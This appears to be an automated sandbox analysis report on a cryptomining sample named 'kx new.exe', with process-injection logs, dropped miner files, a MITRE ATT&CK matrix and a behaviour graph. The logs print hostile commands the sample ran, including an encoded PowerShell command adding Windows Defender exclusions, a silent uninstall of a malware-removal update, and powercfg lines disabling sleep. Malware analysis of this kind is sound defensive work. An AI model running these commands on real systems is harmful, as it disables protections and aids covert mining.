Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2E8CE7E0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1DB17B50000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367A40000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367D00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2534CF30000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="Jump to behavior
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" Jump to behavior
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="Jump to behavior
Source: C:\Windows\System32\dialer.exeCode function: 45_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,45_2_0000000140001B54
Source: C:\Windows\System32\dialer.exeCode function: 45_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,45_2_0000000140001B54
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF736F0 cpuid 10_2_000002534CF736F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\dialer.exeCode function: 45_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,45_2_0000000140001B54
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF97960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_000002534CF97960

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies power options to not sleep / hibernate
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter		1
Windows Service		1
Access Token Manipulation		1
Deobfuscate/Decode Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution		Logon Script (Windows)1
Windows Service		1
Obfuscated Files or Information		Security Account Manager22
System Information Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell		Login Hook712
Process Injection		1
Install Root Certificate		NTDS221
Security Software Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Process Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
Rootkit		Cached Domain Credentials21
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Virtualization/Sandbox Evasion		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron712
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Hidden Files and Directories		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1585415 Sample: kx new.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 66 Antivirus / Scanner detection for submitted sample 2->66 68 Multi AV Scanner detection for dropped file 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 13 other signatures 2->72 8 kx new.exe 3 2->8         started        12 eejhedztifcv.exe 2->12         started        process3 file4 62 C:\Users\user\AppData\Local\...\xmr new.exe, PE32+ 8->62 dropped 64 C:\Users\user\AppData\...\Kawpow new.exe, PE32+ 8->64 dropped 84 Encrypted powershell cmdline option found 8->84 14 Kawpow new.exe 1 8->14         started        17 xmr new.exe 2 8->17         started        20 powershell.exe 23 8->20         started        86 Multi AV Scanner detection for dropped file 12->86 signatures5 process6 file7 92 Modifies the context of a thread in another process (thread injection) 14->92 94 Adds a directory exclusion to Windows Defender 14->94 96 Modifies power options to not sleep / hibernate 14->96 22 dialer.exe 14->22         started        25 powershell.exe 23 14->25         started        27 cmd.exe 1 14->27         started        37 13 other processes 14->37 60 C:\ProgramData\...\eejhedztifcv.exe, PE32+ 17->60 dropped 29 powershell.exe 23 17->29         started        31 cmd.exe 17->31         started        33 sc.exe 1 17->33         started        39 13 other processes 17->39 98 Loading BitLocker PowerShell Module 20->98 35 conhost.exe 20->35         started        signatures8 process9 signatures10 74 Injects code into the Windows Explorer (explorer.exe) 22->74 76 Contains functionality to inject code into remote processes 22->76 78 Writes to foreign memory regions 22->78 82 4 other signatures 22->82 41 lsass.exe 22->41 injected 48 3 other processes 22->48 44 conhost.exe 25->44         started        50 2 other processes 27->50 80 Loading BitLocker PowerShell Module 29->80 52 2 other processes 29->52 54 2 other processes 31->54 46 conhost.exe 33->46         started        56 13 other processes 37->56 58 12 other processes 39->58 process11 signatures12 88 Installs new 